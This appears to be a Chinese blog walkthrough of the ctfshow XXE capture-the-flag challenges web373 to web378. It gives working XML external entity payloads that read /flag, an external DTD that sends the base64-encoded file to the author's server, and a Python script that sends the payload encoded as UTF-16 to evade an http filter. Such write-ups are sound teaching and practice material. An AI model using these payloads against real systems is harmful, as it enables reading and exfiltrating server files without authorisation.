ctfshow XXE web373-web378 wp

24 篇文章 8 订阅
23 篇文章 14 订阅
本文详细介绍了XXE(XML External Entity Injection)漏洞,包括其概念、利用方式及防御措施。通过实例展示了如何利用XXE获取服务器上的flag,并探讨了在无回显情况下的解决策略,如使用自定义DTD文件反弹shell。同时,文章还提到了在遇到HTTP过滤时的编码绕过技巧。
摘要由CSDN通过智能技术生成

web373

XXE(XML External Entity Injection) 全称为 XML 外部实体注入。注入的是XML外部实体

在这里插入图片描述

参考文章:一篇文章带你深入理解漏洞之 XXE 漏洞

libxml_disable_entity_loader(false);:禁止加载外部实体。一个实体由三部分构成: 一个和号 (&), 一个实体名称, 以及一个分号 ( ; )

flag在flag里

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE XXE [
<!ENTITY cmd SYSTEM "file:///flag">
]>
<mumuzi>
<ctfshow>&cmd;</ctfshow>
</mumuzi>

在这里插入图片描述

web374-376

和373的区别是没有echo $ctfshow;,即无回显

因为没有回显,所以只能想办法带到自己vps里。

后面的题把xml头给过滤掉了,这里在vps上创建一个dtd文件,用于反弹shell

#test.dtd
<!ENTITY % dtd "<!ENTITY &#x25; xxe  SYSTEM 'http://xxx:10086/%file;'> ">
%dtd;
%xxe;

监听10086端口

然后POST发包即可在vps上收到

<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % aaa SYSTEM "http://xxx/test.dtd">
%aaa;
]>
<root>1</root>

在这里插入图片描述

其实当时这里卡了许久,4台vps,有一台一直都关了安全组(只开放了两常用端口),有一台没php环境,有一台被Streamlit占用,这台就是刚刚才装的php环境。自己给自己整麻了

web377

方法和上面一样,但是过滤http,需要编码绕过。

import requests
url = 'http://b70f356b-ab20-4df6-b661-d7827322fc80.challenge.ctf.show/'
data = '''<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % aaa SYSTEM "http://101.35.244.30/test.dtd">
%aaa;
]>
<root>1</root>'''
r = requests.post(url=url,data=data.encode('utf-16'))

web378

忒标准的 XXE

<!DOCTYPE XXE [
<!ENTITY cmd SYSTEM "file:///flag">
]>
<user><username>&cmd;</username>
</user>
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值